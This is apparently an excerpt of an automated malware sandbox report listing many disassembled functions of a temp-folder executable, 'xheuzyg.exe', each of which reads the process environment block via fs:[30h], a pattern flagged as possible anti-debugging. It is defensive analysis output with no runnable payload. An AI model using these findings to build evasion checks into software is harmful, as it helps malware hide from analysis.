Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0167A49A mov eax, dword ptr fs:[00000030h]	4_2_0167A49A
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C0750 mov eax, dword ptr fs:[00000030h]	4_2_015C0750
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F674D mov esi, dword ptr fs:[00000030h]	4_2_015F674D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F674D mov eax, dword ptr fs:[00000030h]	4_2_015F674D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F674D mov eax, dword ptr fs:[00000030h]	4_2_015F674D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C8770 mov eax, dword ptr fs:[00000030h]	4_2_015C8770
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]	4_2_015D0770
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]	4_2_015D0770
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]	4_2_015D0770
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]	4_2_015D0770
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]	4_2_015D0770
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]	4_2_015D0770
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]	4_2_015D0770
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]	4_2_015D0770
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]	4_2_015D0770
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]	4_2_015D0770
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]	4_2_015D0770
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]	4_2_015D0770
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602750 mov eax, dword ptr fs:[00000030h]	4_2_01602750
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602750 mov eax, dword ptr fs:[00000030h]	4_2_01602750
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01644755 mov eax, dword ptr fs:[00000030h]	4_2_01644755
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164E75D mov eax, dword ptr fs:[00000030h]	4_2_0164E75D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C0710 mov eax, dword ptr fs:[00000030h]	4_2_015C0710
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F0710 mov eax, dword ptr fs:[00000030h]	4_2_015F0710
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163C730 mov eax, dword ptr fs:[00000030h]	4_2_0163C730
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FC700 mov eax, dword ptr fs:[00000030h]	4_2_015FC700
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F273C mov eax, dword ptr fs:[00000030h]	4_2_015F273C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F273C mov ecx, dword ptr fs:[00000030h]	4_2_015F273C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F273C mov eax, dword ptr fs:[00000030h]	4_2_015F273C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FC720 mov eax, dword ptr fs:[00000030h]	4_2_015FC720
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FC720 mov eax, dword ptr fs:[00000030h]	4_2_015FC720
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164E7E1 mov eax, dword ptr fs:[00000030h]	4_2_0164E7E1
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CC7C0 mov eax, dword ptr fs:[00000030h]	4_2_015CC7C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C47FB mov eax, dword ptr fs:[00000030h]	4_2_015C47FB
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C47FB mov eax, dword ptr fs:[00000030h]	4_2_015C47FB
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016407C3 mov eax, dword ptr fs:[00000030h]	4_2_016407C3
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E27ED mov eax, dword ptr fs:[00000030h]	4_2_015E27ED
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E27ED mov eax, dword ptr fs:[00000030h]	4_2_015E27ED
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E27ED mov eax, dword ptr fs:[00000030h]	4_2_015E27ED
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016747A0 mov eax, dword ptr fs:[00000030h]	4_2_016747A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166678E mov eax, dword ptr fs:[00000030h]	4_2_0166678E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C07AF mov eax, dword ptr fs:[00000030h]	4_2_015C07AF
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168866E mov eax, dword ptr fs:[00000030h]	4_2_0168866E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168866E mov eax, dword ptr fs:[00000030h]	4_2_0168866E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015DC640 mov eax, dword ptr fs:[00000030h]	4_2_015DC640
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F2674 mov eax, dword ptr fs:[00000030h]	4_2_015F2674
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FA660 mov eax, dword ptr fs:[00000030h]	4_2_015FA660
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FA660 mov eax, dword ptr fs:[00000030h]	4_2_015FA660
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D260B mov eax, dword ptr fs:[00000030h]	4_2_015D260B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D260B mov eax, dword ptr fs:[00000030h]	4_2_015D260B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D260B mov eax, dword ptr fs:[00000030h]	4_2_015D260B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D260B mov eax, dword ptr fs:[00000030h]	4_2_015D260B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D260B mov eax, dword ptr fs:[00000030h]	4_2_015D260B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D260B mov eax, dword ptr fs:[00000030h]	4_2_015D260B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D260B mov eax, dword ptr fs:[00000030h]	4_2_015D260B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163E609 mov eax, dword ptr fs:[00000030h]	4_2_0163E609
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C262C mov eax, dword ptr fs:[00000030h]	4_2_015C262C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602619 mov eax, dword ptr fs:[00000030h]	4_2_01602619
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015DE627 mov eax, dword ptr fs:[00000030h]	4_2_015DE627
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F6620 mov eax, dword ptr fs:[00000030h]	4_2_015F6620
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F8620 mov eax, dword ptr fs:[00000030h]	4_2_015F8620
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0163E6F2
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0163E6F2
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0163E6F2
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0163E6F2
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016406F1 mov eax, dword ptr fs:[00000030h]	4_2_016406F1
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016406F1 mov eax, dword ptr fs:[00000030h]	4_2_016406F1
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FA6C7 mov ebx, dword ptr fs:[00000030h]	4_2_015FA6C7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FA6C7 mov eax, dword ptr fs:[00000030h]	4_2_015FA6C7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C4690 mov eax, dword ptr fs:[00000030h]	4_2_015C4690
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C4690 mov eax, dword ptr fs:[00000030h]	4_2_015C4690
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F66B0 mov eax, dword ptr fs:[00000030h]	4_2_015F66B0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FC6A6 mov eax, dword ptr fs:[00000030h]	4_2_015FC6A6
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0160096E mov eax, dword ptr fs:[00000030h]	4_2_0160096E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0160096E mov edx, dword ptr fs:[00000030h]	4_2_0160096E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0160096E mov eax, dword ptr fs:[00000030h]	4_2_0160096E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164C97C mov eax, dword ptr fs:[00000030h]	4_2_0164C97C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01664978 mov eax, dword ptr fs:[00000030h]	4_2_01664978
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01664978 mov eax, dword ptr fs:[00000030h]	4_2_01664978
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01640946 mov eax, dword ptr fs:[00000030h]	4_2_01640946
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01694940 mov eax, dword ptr fs:[00000030h]	4_2_01694940
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E6962 mov eax, dword ptr fs:[00000030h]	4_2_015E6962
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E6962 mov eax, dword ptr fs:[00000030h]	4_2_015E6962
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E6962 mov eax, dword ptr fs:[00000030h]	4_2_015E6962
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015B8918 mov eax, dword ptr fs:[00000030h]	4_2_015B8918
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015B8918 mov eax, dword ptr fs:[00000030h]	4_2_015B8918
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164892A mov eax, dword ptr fs:[00000030h]	4_2_0164892A
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0165892B mov eax, dword ptr fs:[00000030h]	4_2_0165892B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163E908 mov eax, dword ptr fs:[00000030h]	4_2_0163E908
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163E908 mov eax, dword ptr fs:[00000030h]	4_2_0163E908
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164C912 mov eax, dword ptr fs:[00000030h]	4_2_0164C912
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164E9E0 mov eax, dword ptr fs:[00000030h]	4_2_0164E9E0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA9D0 mov eax, dword ptr fs:[00000030h]	4_2_015CA9D0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA9D0 mov eax, dword ptr fs:[00000030h]	4_2_015CA9D0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA9D0 mov eax, dword ptr fs:[00000030h]	4_2_015CA9D0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA9D0 mov eax, dword ptr fs:[00000030h]	4_2_015CA9D0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA9D0 mov eax, dword ptr fs:[00000030h]	4_2_015CA9D0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015CA9D0 mov eax, dword ptr fs:[00000030h]	4_2_015CA9D0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F49D0 mov eax, dword ptr fs:[00000030h]	4_2_015F49D0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016569C0 mov eax, dword ptr fs:[00000030h]	4_2_016569C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F29F9 mov eax, dword ptr fs:[00000030h]	4_2_015F29F9
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F29F9 mov eax, dword ptr fs:[00000030h]	4_2_015F29F9
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168A9D3 mov eax, dword ptr fs:[00000030h]	4_2_0168A9D3
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016489B3 mov esi, dword ptr fs:[00000030h]	4_2_016489B3
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016489B3 mov eax, dword ptr fs:[00000030h]	4_2_016489B3
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016489B3 mov eax, dword ptr fs:[00000030h]	4_2_016489B3
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C09AD mov eax, dword ptr fs:[00000030h]	4_2_015C09AD
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C09AD mov eax, dword ptr fs:[00000030h]	4_2_015C09AD
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]	4_2_015D29A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]	4_2_015D29A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]	4_2_015D29A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]	4_2_015D29A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]	4_2_015D29A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]	4_2_015D29A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]	4_2_015D29A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]	4_2_015D29A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]	4_2_015D29A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]	4_2_015D29A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]	4_2_015D29A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]	4_2_015D29A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]	4_2_015D29A0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C4859 mov eax, dword ptr fs:[00000030h]	4_2_015C4859
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C4859 mov eax, dword ptr fs:[00000030h]	4_2_015C4859
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F0854 mov eax, dword ptr fs:[00000030h]	4_2_015F0854
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01656870 mov eax, dword ptr fs:[00000030h]	4_2_01656870
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01656870 mov eax, dword ptr fs:[00000030h]	4_2_01656870
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164E872 mov eax, dword ptr fs:[00000030h]	4_2_0164E872
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164E872 mov eax, dword ptr fs:[00000030h]	4_2_0164E872
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D2840 mov ecx, dword ptr fs:[00000030h]	4_2_015D2840
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166483A mov eax, dword ptr fs:[00000030h]	4_2_0166483A
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166483A mov eax, dword ptr fs:[00000030h]	4_2_0166483A
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E2835 mov eax, dword ptr fs:[00000030h]	4_2_015E2835
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E2835 mov eax, dword ptr fs:[00000030h]	4_2_015E2835
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E2835 mov eax, dword ptr fs:[00000030h]	4_2_015E2835
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E2835 mov ecx, dword ptr fs:[00000030h]	4_2_015E2835
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E2835 mov eax, dword ptr fs:[00000030h]	4_2_015E2835
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E2835 mov eax, dword ptr fs:[00000030h]	4_2_015E2835
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FA830 mov eax, dword ptr fs:[00000030h]	4_2_015FA830
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164C810 mov eax, dword ptr fs:[00000030h]	4_2_0164C810
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168A8E4 mov eax, dword ptr fs:[00000030h]	4_2_0168A8E4
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EE8C0 mov eax, dword ptr fs:[00000030h]	4_2_015EE8C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FC8F9 mov eax, dword ptr fs:[00000030h]	4_2_015FC8F9
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FC8F9 mov eax, dword ptr fs:[00000030h]	4_2_015FC8F9
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016908C0 mov eax, dword ptr fs:[00000030h]	4_2_016908C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C0887 mov eax, dword ptr fs:[00000030h]	4_2_015C0887
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164C89D mov eax, dword ptr fs:[00000030h]	4_2_0164C89D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015B8B50 mov eax, dword ptr fs:[00000030h]	4_2_015B8B50
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01668B42 mov eax, dword ptr fs:[00000030h]	4_2_01668B42
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01656B40 mov eax, dword ptr fs:[00000030h]	4_2_01656B40
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01656B40 mov eax, dword ptr fs:[00000030h]	4_2_01656B40
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015BCB7E mov eax, dword ptr fs:[00000030h]	4_2_015BCB7E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0168AB40 mov eax, dword ptr fs:[00000030h]	4_2_0168AB40
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01674B4B mov eax, dword ptr fs:[00000030h]	4_2_01674B4B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01674B4B mov eax, dword ptr fs:[00000030h]	4_2_01674B4B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166EB50 mov eax, dword ptr fs:[00000030h]	4_2_0166EB50
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01692B57 mov eax, dword ptr fs:[00000030h]	4_2_01692B57
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01692B57 mov eax, dword ptr fs:[00000030h]	4_2_01692B57
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01692B57 mov eax, dword ptr fs:[00000030h]	4_2_01692B57
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01692B57 mov eax, dword ptr fs:[00000030h]	4_2_01692B57
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01688B28 mov eax, dword ptr fs:[00000030h]	4_2_01688B28
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01688B28 mov eax, dword ptr fs:[00000030h]	4_2_01688B28
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01694B00 mov eax, dword ptr fs:[00000030h]	4_2_01694B00
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]	4_2_0163EB1D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]	4_2_0163EB1D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]	4_2_0163EB1D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]	4_2_0163EB1D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]	4_2_0163EB1D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]	4_2_0163EB1D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]	4_2_0163EB1D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]	4_2_0163EB1D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163EB1D mov eax, dword ptr fs:[00000030h]	4_2_0163EB1D
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EEB20 mov eax, dword ptr fs:[00000030h]	4_2_015EEB20
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EEB20 mov eax, dword ptr fs:[00000030h]	4_2_015EEB20
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C0BCD mov eax, dword ptr fs:[00000030h]	4_2_015C0BCD
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C0BCD mov eax, dword ptr fs:[00000030h]	4_2_015C0BCD
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C0BCD mov eax, dword ptr fs:[00000030h]	4_2_015C0BCD
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164CBF0 mov eax, dword ptr fs:[00000030h]	4_2_0164CBF0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E0BCB mov eax, dword ptr fs:[00000030h]	4_2_015E0BCB
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E0BCB mov eax, dword ptr fs:[00000030h]	4_2_015E0BCB
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E0BCB mov eax, dword ptr fs:[00000030h]	4_2_015E0BCB
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EEBFC mov eax, dword ptr fs:[00000030h]	4_2_015EEBFC
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C8BF0 mov eax, dword ptr fs:[00000030h]	4_2_015C8BF0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C8BF0 mov eax, dword ptr fs:[00000030h]	4_2_015C8BF0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C8BF0 mov eax, dword ptr fs:[00000030h]	4_2_015C8BF0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166EBD0 mov eax, dword ptr fs:[00000030h]	4_2_0166EBD0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01674BB0 mov eax, dword ptr fs:[00000030h]	4_2_01674BB0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01674BB0 mov eax, dword ptr fs:[00000030h]	4_2_01674BB0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0BBE mov eax, dword ptr fs:[00000030h]	4_2_015D0BBE
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0BBE mov eax, dword ptr fs:[00000030h]	4_2_015D0BBE
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0A5B mov eax, dword ptr fs:[00000030h]	4_2_015D0A5B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015D0A5B mov eax, dword ptr fs:[00000030h]	4_2_015D0A5B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0166EA60 mov eax, dword ptr fs:[00000030h]	4_2_0166EA60
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C6A50 mov eax, dword ptr fs:[00000030h]	4_2_015C6A50
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C6A50 mov eax, dword ptr fs:[00000030h]	4_2_015C6A50
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C6A50 mov eax, dword ptr fs:[00000030h]	4_2_015C6A50
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C6A50 mov eax, dword ptr fs:[00000030h]	4_2_015C6A50
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C6A50 mov eax, dword ptr fs:[00000030h]	4_2_015C6A50
